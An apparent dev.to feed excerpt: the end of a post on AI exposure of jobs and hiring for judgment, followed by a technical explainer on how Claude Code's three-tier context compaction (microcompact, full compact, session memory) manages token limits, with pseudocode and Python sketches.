&lt;td&gt;70.1%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Data Entry Keyers&lt;/td&gt;
&lt;td&gt;67.1%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Medical Record Specialists&lt;/td&gt;
&lt;td&gt;66.7%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Market Research Analysts&lt;/td&gt;
&lt;td&gt;64.8%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sales Representatives&lt;/td&gt;
&lt;td&gt;62.8%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Financial &amp;amp; Investment Analysts&lt;/td&gt;
&lt;td&gt;57.2%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Software QA Analysts &amp;amp; Testers&lt;/td&gt;
&lt;td&gt;51.9%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Information Security Analysts&lt;/td&gt;
&lt;td&gt;48.6%&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Computer User Support Specialists&lt;/td&gt;
&lt;td&gt;46.8%&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;More than 90% of the work done by tech and finance workers could — in theory — be replaced by AI. But the more important story is underneath.&lt;/p&gt;

&lt;h2&gt;
  
  
  The gap
&lt;/h2&gt;

&lt;p&gt;There hasn't been a clear rise in unemployment for highly exposed roles since late 2022. Adoption in computer and math jobs sits around 33% compared to 94% capability. 30% of workers currently have zero meaningful AI task coverage in the data.&lt;/p&gt;

&lt;p&gt;At the same time, job-finding rates for workers aged 22–25 in exposed roles are down 14%. Goldman Sachs estimates that AI is driving roughly 16,000 U.S. job cuts per month, with Gen Z feeling it first.&lt;/p&gt;

&lt;p&gt;The displacement isn't evenly distributed. It's hitting the youngest workers first — the ones with the least leverage, the smallest networks, and the most to prove.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation vs. judgment
&lt;/h2&gt;

&lt;p&gt;McCrory breaks knowledge work into three parts: asking the right questions, implementation, and expert evaluation. The implementation layer is getting saturated by AI. The other two aren't.&lt;/p&gt;

&lt;p&gt;From what I see day to day as a CTO, that tracks.&lt;/p&gt;

&lt;p&gt;The developers doing well right now aren't the ones who memorized the most syntax or can write a perfect binary search on a whiteboard. They're the ones who know what to build, can evaluate outputs, and can tell when AI is wrong. Implementation matters less than it used to. Judgment matters more.&lt;/p&gt;

&lt;h2&gt;
  
  
  That changes how I hire
&lt;/h2&gt;

&lt;p&gt;I'm looking for people who can frame problems clearly, spot when something is off even if it compiles, and guide AI tools without blindly trusting them. People who can think in systems, not just code.&lt;/p&gt;

&lt;p&gt;If your hiring process still rewards speed on basic coding exercises, you're optimizing for a layer that's getting automated. The people you actually need don't always stand out in those interviews.&lt;/p&gt;

&lt;p&gt;McCrory compared this moment to electricity. The real impact didn't come from simply plugging machines in — it came from reorganizing work around it. We're still early in that shift.&lt;/p&gt;

&lt;h2&gt;
  
  
  The window
&lt;/h2&gt;

&lt;p&gt;There's a bigger risk in the background. A downturn for white-collar work is possible. Anthropic's own economist has said as much. It hasn't happened yet, but decisions made now will shape whether it does.&lt;/p&gt;

&lt;p&gt;That 94% vs. 30% gap isn't a comfort zone. It's a window.&lt;/p&gt;

&lt;p&gt;For engineering leaders, using it well means rethinking who you hire, how you evaluate them, and what skills will actually matter soon.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Follow me on &lt;a href="https://x.com/oldeucryptoboi" rel="noopener noreferrer"&gt;X&lt;/a&gt; — I post as &lt;a class="mentioned-user" href="https://dev.to/oldeucryptoboi"&gt;@oldeucryptoboi&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>hiring</category>
      <category>softwareengineering</category>
      <category>futureofwork</category>
    </item>
    <item>
      <title>How Claude Code Manages Infinite Conversations in a Finite Context Window</title>
      <dc:creator>Laurent DeSegur</dc:creator>
      <pubDate>Tue, 07 Apr 2026 14:42:45 +0000</pubDate>
      <link>https://dev.to/oldeucryptoboi/how-claude-code-manages-infinite-conversations-in-a-finite-context-window-4ld0</link>
      <guid>https://dev.to/oldeucryptoboi/how-claude-code-manages-infinite-conversations-in-a-finite-context-window-4ld0</guid>
      <description>&lt;p&gt;Claude Code conversations have no turn limit. You can work for hours — reading files, running tests, debugging, iterating — and the conversation just keeps going. But the model has a fixed context window. At some point, the accumulated messages exceed what the model can process in a single API call.&lt;/p&gt;

&lt;p&gt;The system needs to compress the conversation without losing critical context. Here's how it works, from the source code.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;The naive approach is truncation: drop old messages when the window fills up. This fails immediately. A conversation about building an authentication system might reference a design decision from 50 turns ago. Truncate those turns and the model forgets the decision, re-asks the question, or contradicts what it said earlier.&lt;/p&gt;

&lt;p&gt;A better approach: summarize. Replace the old messages with a summary that preserves the essential information. But summarization introduces its own problems:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;What to preserve?&lt;/strong&gt; File paths, code snippets, user preferences, error resolutions, pending tasks — all matter. A generic "summarize this conversation" prompt loses critical details.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;When to trigger?&lt;/strong&gt; Too early wastes context window. Too late risks hitting the hard limit and failing the API call.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What about the cache?&lt;/strong&gt; Anthropic's API caches the prompt prefix. Compaction replaces all messages, invalidating the cache. Every token in the new prompt is a cache miss — expensive.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What if the summary itself is too long?&lt;/strong&gt; If the conversation is so large that even the compaction request exceeds the context window, you need a fallback.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Claude Code solves these with a three-tier system. Microcompact clears stale tool results without calling the model. Full compact summarizes the entire conversation with a dedicated model call. Session memory compact uses pre-extracted notes to skip the summarization call entirely. Each tier is progressively more aggressive and more expensive.&lt;/p&gt;

&lt;h2&gt;
  
  
  When to Compact
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Threshold
&lt;/h3&gt;

&lt;p&gt;Auto-compact fires when the conversation's token count exceeds a threshold. The threshold is calculated as:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;effectiveWindow&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;contextWindow&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="nf"&gt;max&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;maxOutputTokens&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;20_000&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;autoCompactThreshold&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;effectiveWindow&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="mi"&gt;13_000&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For a 200K context window model, this works out to roughly 167K tokens. The 20K reserve ensures the model has room to generate the summary. The 13K buffer provides headroom — the system checks BEFORE each API call, so the actual token count may grow by a full model response between checks.&lt;/p&gt;

&lt;p&gt;The threshold can be overridden via environment variables for testing. A percentage-based override lets you trigger compaction earlier (useful for observing the system's behavior on shorter conversations).&lt;/p&gt;
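&lt;p&gt;As a minimal sketch, the arithmetic plus a percentage override might look like this. The env var name here is illustrative, not the actual one:&lt;/p&gt;

```python
import os

def auto_compact_threshold(context_window: int, max_output_tokens: int) -> int:
    # Reserve room for the model to generate the summary, plus headroom
    # for growth between threshold checks (checked BEFORE each API call).
    effective_window = context_window - max(max_output_tokens, 20_000)
    threshold = effective_window - 13_000
    # Hypothetical percentage override for testing (not the real env var name).
    pct = os.environ.get("COMPACT_THRESHOLD_PCT")
    if pct:
        threshold = int(context_window * float(pct) / 100)
    return threshold
```

&lt;p&gt;With the default 20K reserve, a 200K window yields 200,000 − 20,000 − 13,000 = 167,000 tokens.&lt;/p&gt;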

&lt;h3&gt;
  
  
  Token Counting
&lt;/h3&gt;

&lt;p&gt;The canonical function for context size is &lt;code&gt;tokenCountWithEstimation&lt;/code&gt;. It works in two parts:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Find the last API response&lt;/strong&gt;: Walk backward through messages to find the most recent assistant message that has a &lt;code&gt;usage&lt;/code&gt; field (reported by the API). This gives the exact token count at that point in the conversation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Estimate new messages&lt;/strong&gt;: For any messages added AFTER the last API response, estimate their token count. Text blocks use a rough &lt;code&gt;length / 4&lt;/code&gt; heuristic (one token per ~4 characters). Images and documents get a flat 2,000-token estimate. Tool use blocks count the tool name plus JSON-serialized input. The total estimate is padded by 4/3 (33% conservative buffer). Add this to the API-reported count.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;A subtlety: when the model makes multiple parallel tool calls, each becomes a separate assistant message interleaved with tool results. The messages look like: &lt;code&gt;[..., assistant(id=A), toolResult, assistant(id=A), toolResult, ...]&lt;/code&gt;. All of these share the same message ID because they came from one API response. The token counter must walk back to the FIRST message with matching ID to anchor correctly — stopping at the last one would miss the interleaved tool results and undercount.&lt;/p&gt;

&lt;p&gt;The total context count includes input tokens, cache creation tokens, cache read tokens, and output tokens. This represents the actual context window consumption, which is what matters for threshold comparison. Using only &lt;code&gt;input_tokens&lt;/code&gt; would undercount because cached tokens still occupy the window.&lt;/p&gt;
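&lt;p&gt;A simplified sketch of this two-part count, assuming flattened message shapes (the real implementation handles more block types and edge cases):&lt;/p&gt;

```python
import json

def estimate_message_tokens(msg: dict) -> int:
    content = msg.get("content", [])
    if isinstance(content, str):
        return len(content) // 4                      # ~4 chars per token
    total = 0
    for block in content:
        btype = block.get("type")
        if btype == "text":
            total += len(block.get("text", "")) // 4
        elif btype in ("image", "document"):
            total += 2_000                            # flat per-attachment estimate
        elif btype == "tool_use":
            total += (len(block.get("name", "")) +
                      len(json.dumps(block.get("input", {})))) // 4
        elif btype == "tool_result":
            total += len(json.dumps(block.get("content", ""))) // 4
    return total

def token_count_with_estimation(messages: list) -> int:
    base, to_estimate = 0, messages
    for i in range(len(messages) - 1, -1, -1):
        m = messages[i]
        if m.get("role") == "assistant" and m.get("usage"):
            u = m["usage"]
            # Cached tokens still occupy the window, so count every field.
            base = sum(u.get(k, 0) for k in (
                "input_tokens", "cache_creation_input_tokens",
                "cache_read_input_tokens", "output_tokens"))
            # Walk back to the FIRST message of the same API response so the
            # interleaved tool results after it are estimated, not skipped.
            msg_id = m.get("id")
            anchor = i
            while anchor > 0 and messages[anchor - 1].get("id") == msg_id:
                anchor -= 1
            to_estimate = [x for x in messages[anchor + 1:]
                           if x.get("id") != msg_id]
            break
    est = sum(estimate_message_tokens(x) for x in to_estimate)
    return base + est * 4 // 3                        # 33% conservative pad
```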

&lt;h3&gt;
  
  
  The Circuit Breaker
&lt;/h3&gt;

&lt;p&gt;If compaction fails three times consecutively, auto-compact stops trying. This circuit breaker prevents runaway API costs. Before the breaker, telemetry showed 1,279 sessions with 50+ consecutive failures, wasting approximately 250,000 API calls per day. The breaker resets on any successful compaction.&lt;/p&gt;
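&lt;p&gt;The breaker itself is just a consecutive-failure counter; a minimal sketch (class and method names are illustrative):&lt;/p&gt;

```python
class CompactionBreaker:
    """Stop auto-compact after N consecutive failures; reset on success."""
    MAX_CONSECUTIVE_FAILURES = 3

    def __init__(self):
        self.failures = 0

    def allow(self) -> bool:
        return self.failures < self.MAX_CONSECUTIVE_FAILURES

    def record_failure(self):
        self.failures += 1

    def record_success(self):
        self.failures = 0   # any successful compaction resets the breaker
```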

&lt;h3&gt;
  
  
  Recursion Guards
&lt;/h3&gt;

&lt;p&gt;Auto-compact skips triggering when the query source is &lt;code&gt;compact&lt;/code&gt; (would deadlock — compaction triggering compaction) or &lt;code&gt;session_memory&lt;/code&gt; (would deadlock — memory extraction happens in a forked subagent that shares the token counter).&lt;/p&gt;

&lt;h2&gt;
  
  
  Tier 1: Microcompact
&lt;/h2&gt;

&lt;p&gt;Microcompact is the cheapest intervention. No model call. No summarization. It just clears old tool results that the model no longer needs, reclaiming tokens.&lt;/p&gt;

&lt;h3&gt;
  
  
  Time-Based Clearing
&lt;/h3&gt;

&lt;p&gt;The API prompt cache has a TTL of roughly one hour. When the user returns after an idle period, the entire cached prefix is gone — every token will be re-processed anyway. This is the ideal time to clear stale tool results, because there's no cache to preserve.&lt;/p&gt;

&lt;p&gt;The trigger:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;gap&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;now&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;lastAssistantMessage&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;timestamp&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="mi"&gt;60_000&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;gap&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nf"&gt;gapThresholdMinutes &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;default&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;60&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="n"&gt;clear&lt;/span&gt; &lt;span class="n"&gt;old&lt;/span&gt; &lt;span class="n"&gt;tool&lt;/span&gt; &lt;span class="n"&gt;results&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;"Clear" means replacing the content of &lt;code&gt;tool_result&lt;/code&gt; blocks for compactable tools (file reads, shell output, grep results, glob results, web fetches, web searches, edits, writes) with the text &lt;code&gt;[Old tool result content cleared]&lt;/code&gt;. The system keeps the N most recent results (default: 5) and clears the rest.&lt;/p&gt;

&lt;p&gt;This is a mutation of the message array. The cleared results are gone. But since the cache was already expired, there's no cost — the full conversation will be re-tokenized regardless.&lt;/p&gt;
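&lt;p&gt;A sketch of the keep-N-most-recent clearing (the tool names in the allowlist are illustrative stand-ins for the actual identifiers):&lt;/p&gt;

```python
COMPACTABLE_TOOLS = {"Read", "Bash", "Grep", "Glob",
                     "WebFetch", "WebSearch", "Edit", "Write"}
CLEARED = "[Old tool result content cleared]"

def microcompact(messages: list, keep_recent: int = 5) -> None:
    """Clear all but the N most recent compactable tool results, in place."""
    tool_names = {}   # tool_use id -> tool name
    compactable = []  # tool_result blocks eligible for clearing, in order
    for msg in messages:
        for block in msg.get("content", []):
            if block.get("type") == "tool_use":
                tool_names[block["id"]] = block["name"]
            elif (block.get("type") == "tool_result" and
                  tool_names.get(block.get("tool_use_id")) in COMPACTABLE_TOOLS):
                compactable.append(block)
    for block in compactable[:max(0, len(compactable) - keep_recent)]:
        block["content"] = CLEARED
```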

&lt;h3&gt;
  
  
  Cached Microcompact
&lt;/h3&gt;

&lt;p&gt;When the prompt cache is still warm, mutating messages would invalidate the cached prefix. Instead, the system uses the API's &lt;code&gt;cache_edits&lt;/code&gt; feature to delete tool results server-side. The local message array stays unchanged, but the API receives a &lt;code&gt;cache_edits&lt;/code&gt; block that instructs the server to remove specific tool results by their cache reference IDs.&lt;/p&gt;

&lt;p&gt;The state machine tracks three things:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;registeredTools&lt;/strong&gt;: Set of all tool_use IDs seen (deduplicated)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;toolOrder&lt;/strong&gt;: List of tool_use IDs in encounter order (FIFO for deletion priority)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;deletedRefs&lt;/strong&gt;: Set of IDs already deleted (prevents re-deletion)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The logic:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;activeTools&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;toolOrder&lt;/span&gt; &lt;span class="n"&gt;filtered&lt;/span&gt; &lt;span class="n"&gt;by&lt;/span&gt; &lt;span class="n"&gt;NOT&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;deletedRefs&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;activeTools&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="nf"&gt;triggerThreshold &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;default&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;12&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
  &lt;span class="nf"&gt;return &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="ow"&gt;not&lt;/span&gt; &lt;span class="n"&gt;enough&lt;/span&gt; &lt;span class="n"&gt;tools&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;justify&lt;/span&gt; &lt;span class="n"&gt;clearing&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;toDelete&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;activeTools&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="p"&gt;..&lt;/span&gt; &lt;span class="n"&gt;activeTools&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;length&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;keepRecent&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;each&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;toDelete&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
  &lt;span class="n"&gt;add&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;deletedRefs&lt;/span&gt;
  &lt;span class="n"&gt;create&lt;/span&gt; &lt;span class="n"&gt;cache_edit&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;delete&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cache_reference&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;queue&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="nf"&gt;pendingCacheEdits &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;applied&lt;/span&gt; &lt;span class="n"&gt;at&lt;/span&gt; &lt;span class="n"&gt;API&lt;/span&gt; &lt;span class="n"&gt;layer&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The cache edits are "pinned" — once queued, they're re-sent on every subsequent API call for as long as the cache hit persists. This is necessary because cache edits are relative to the cached prefix, not absolute. If the server cache is hit, the pinned edits tell it which blocks to skip.&lt;/p&gt;

&lt;p&gt;If the cache expires (detected by a drop in &lt;code&gt;cache_read_input_tokens&lt;/code&gt;), the pinned edits become stale. The system falls through to time-based clearing on the next idle gap. The pinned edits are also cleared during full compaction's post-compact cleanup.&lt;/p&gt;

&lt;p&gt;The system also captures the baseline &lt;code&gt;cache_deleted_input_tokens&lt;/code&gt; from the last assistant message. This baseline is needed by the cache break detection system — without it, the token drop from cached edits would trigger a false "cache break" warning.&lt;/p&gt;

&lt;h3&gt;
  
  
  Compactable Tools
&lt;/h3&gt;

&lt;p&gt;Not all tool results are safe to clear. The system maintains an allowlist:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;File reads&lt;/strong&gt; — the file can be re-read&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Shell output&lt;/strong&gt; — the output is ephemeral&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Grep/glob results&lt;/strong&gt; — search results can be re-run&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Web fetch/search&lt;/strong&gt; — fetched content can be re-fetched&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;File edits/writes&lt;/strong&gt; — the confirmation output is disposable&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Tool results from other tools (like user questions, notebook edits, or task management) are NOT cleared — their content may be unreproducible.&lt;/p&gt;

&lt;h3&gt;
  
  
  API-Native Context Management
&lt;/h3&gt;

&lt;p&gt;Beyond local microcompact, the system can also request that the API itself manage context. This uses the &lt;code&gt;context_management&lt;/code&gt; field in API requests to specify edit strategies:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tool result clearing&lt;/strong&gt;: When input tokens exceed a trigger threshold (default: 180K), the API clears tool results from specific tools (file reads, shell output, grep, glob, web fetches, web searches), keeping the most recent results up to a target token budget (default: 40K). The &lt;code&gt;clear_at_least&lt;/code&gt; parameter ensures a minimum number of tokens are freed — clearing one small tool result when the context is at 180K wouldn't help.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Tool use clearing&lt;/strong&gt;: A separate strategy for edit/write tools. Rather than clearing their inputs, it excludes their entire tool_use blocks. The distinction matters: for read-like tools, the large output (file content, shell output) is the waste. For write-like tools, the large input (new file content) is the waste.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Thinking clearing&lt;/strong&gt;: For models with extended thinking, old thinking blocks are the largest tokens-per-message contributor. When the user has been idle for over an hour (cache expired anyway), only the last thinking turn is kept. During active use, all thinking turns are preserved.&lt;/p&gt;

&lt;p&gt;These strategies compose — multiple edit strategies can be active simultaneously, each targeting a different category of clearable content.&lt;/p&gt;
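&lt;p&gt;A request carrying both strategies might be shaped roughly like the fragment below. This is a sketch of the described behavior, not a verified API schema — the field names are illustrative and should be checked against the provider's context-editing documentation:&lt;/p&gt;

```python
# Illustrative request fragment only: field names sketch the behavior
# described above and are NOT a verified API schema.
request = {
    "model": "claude-sonnet-4-5",     # placeholder model id
    "max_tokens": 8192,
    "context_management": {
        "edits": [
            {
                # Read-like tools: the large OUTPUT is the waste, so clear
                # results once input exceeds 180K, keep recent results within
                # a 40K budget, and free a minimum amount per pass.
                "type": "clear_tool_results",       # illustrative name
                "trigger_input_tokens": 180_000,
                "keep_budget_tokens": 40_000,
                "clear_at_least_tokens": 10_000,    # illustrative value
            },
            {
                # Write-like tools: the large INPUT (new file content) is
                # the waste, so exclude whole tool_use blocks instead.
                "type": "clear_tool_uses",          # illustrative name
                "tools": ["Edit", "Write"],
            },
        ]
    },
}
```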

&lt;h2&gt;
  
  
  Tier 2: Full Compact
&lt;/h2&gt;

&lt;p&gt;When microcompact isn't enough — the conversation has genuinely grown past the threshold — the system performs a full compaction. This calls the model to summarize the entire conversation history.&lt;/p&gt;

&lt;h3&gt;
  
  
  Pre-Processing
&lt;/h3&gt;

&lt;p&gt;Before the conversation is sent for summarization, two pre-processing steps run:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Image stripping&lt;/strong&gt;: All image and document blocks are removed from user messages, replaced with an &lt;code&gt;[image]&lt;/code&gt; text marker. Images are large (potentially thousands of tokens each) and not useful for text summarization. The stripping also handles images nested inside tool_result content arrays — a tool might return screenshots that are irrelevant to the summary.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Attachment stripping&lt;/strong&gt;: Skill discovery and skill listing attachments are removed before summarization. These are re-injected post-compact anyway, so including them in the summarization input wastes tokens — the model would summarize content that's about to be restored verbatim.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Summarization Prompt
&lt;/h3&gt;

&lt;p&gt;The prompt is the most interesting part. It demands a specific structure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;CRITICAL: Respond with TEXT ONLY. Do NOT call any tools.
- Do NOT use Read, Bash, Grep, Glob, Edit, Write, or ANY other tool.
- Tool calls will be REJECTED and will waste your only turn — you will fail the task.
- Your entire response must be plain text: an &amp;lt;analysis&amp;gt; block followed by a &amp;lt;summary&amp;gt; block.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This preamble appears at both the START and END of the prompt (dual-instruction pattern). Why? Models with adaptive thinking sometimes attempt tool calls during summarization despite single instructions. The duplication makes non-compliance less likely.&lt;/p&gt;

&lt;p&gt;The prompt then requires nine specific sections in the summary:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Primary Request and Intent&lt;/strong&gt; — All explicit user requests and intents, in detail.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Key Technical Concepts&lt;/strong&gt; — Important technologies, frameworks, and architectural decisions.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Files and Code Sections&lt;/strong&gt; — Every file examined, modified, or created, with full code snippets and rationale.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Errors and Fixes&lt;/strong&gt; — Every error encountered and how it was resolved.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Problem Solving&lt;/strong&gt; — Problems solved and ongoing troubleshooting approaches.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;All User Messages&lt;/strong&gt; — ALL non-tool-result user messages. Critical for understanding feedback and corrections.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Pending Tasks&lt;/strong&gt; — Explicitly requested tasks that haven't been completed.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Current Work&lt;/strong&gt; — Precise detail of work immediately before summarization, with filenames and code snippets.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Optional Next Step&lt;/strong&gt; — The next step in line with recent requests, with direct quotes showing task status.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Section 6 ("All user messages") is the most unusual. Summarization typically abstracts away individual messages. But user messages contain corrections ("no, I meant X"), preferences ("always use bun"), and implicit context that a summary might smooth over. Preserving them verbatim prevents the model from drifting away from what the user actually said.&lt;/p&gt;

&lt;p&gt;Section 9 requires "direct quotes" from the conversation to justify the suggested next step. This prevents task drift — without quotes, the model might hallucinate a next step that wasn't actually in progress.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Analysis Scratchpad
&lt;/h3&gt;

&lt;p&gt;The prompt asks for TWO blocks: &lt;code&gt;&amp;lt;analysis&amp;gt;&lt;/code&gt; then &lt;code&gt;&amp;lt;summary&amp;gt;&lt;/code&gt;. The analysis block is a drafting scratchpad — the model walks through the conversation chronologically, identifying requests, decisions, code changes, and errors. This structured thinking improves the quality of the summary that follows.&lt;/p&gt;

&lt;p&gt;But the analysis block is stripped before delivery. &lt;code&gt;formatCompactSummary&lt;/code&gt; removes everything between &lt;code&gt;&amp;lt;analysis&amp;gt;&lt;/code&gt; tags, extracts the &lt;code&gt;&amp;lt;summary&amp;gt;&lt;/code&gt; content, and replaces the tags with a "Summary:" header. The user never sees the scratchpad. It exists purely to improve the summary via chain-of-thought reasoning.&lt;/p&gt;
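&lt;p&gt;A minimal sketch of that stripping step (the real &lt;code&gt;formatCompactSummary&lt;/code&gt; likely handles more edge cases):&lt;/p&gt;

```python
import re

def format_compact_summary(raw: str) -> str:
    # Drop the scratchpad entirely, then surface the summary body
    # under a plain "Summary:" header.
    text = re.sub(r"<analysis>.*?</analysis>", "", raw, flags=re.DOTALL)
    m = re.search(r"<summary>(.*?)</summary>", text, flags=re.DOTALL)
    body = m.group(1).strip() if m else text.strip()
    return "Summary:\n" + body
```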

&lt;h3&gt;
  
  
  Prompt Cache Sharing
&lt;/h3&gt;

&lt;p&gt;The summarization call sends the entire conversation as context. Normally this means re-tokenizing everything — expensive. But the main conversation's prompt prefix (system prompt, tools, early messages) is already cached from the most recent API call.&lt;/p&gt;

&lt;p&gt;The system uses a "forked agent" to reuse this cache. The fork inherits the main conversation's cached parameters (system prompt, tool definitions, user context) and sends them as identical cache-key parameters, so the summarization call gets a cache hit on the shared prefix. The remaining messages (the ones being summarized) are the only new tokens.&lt;/p&gt;

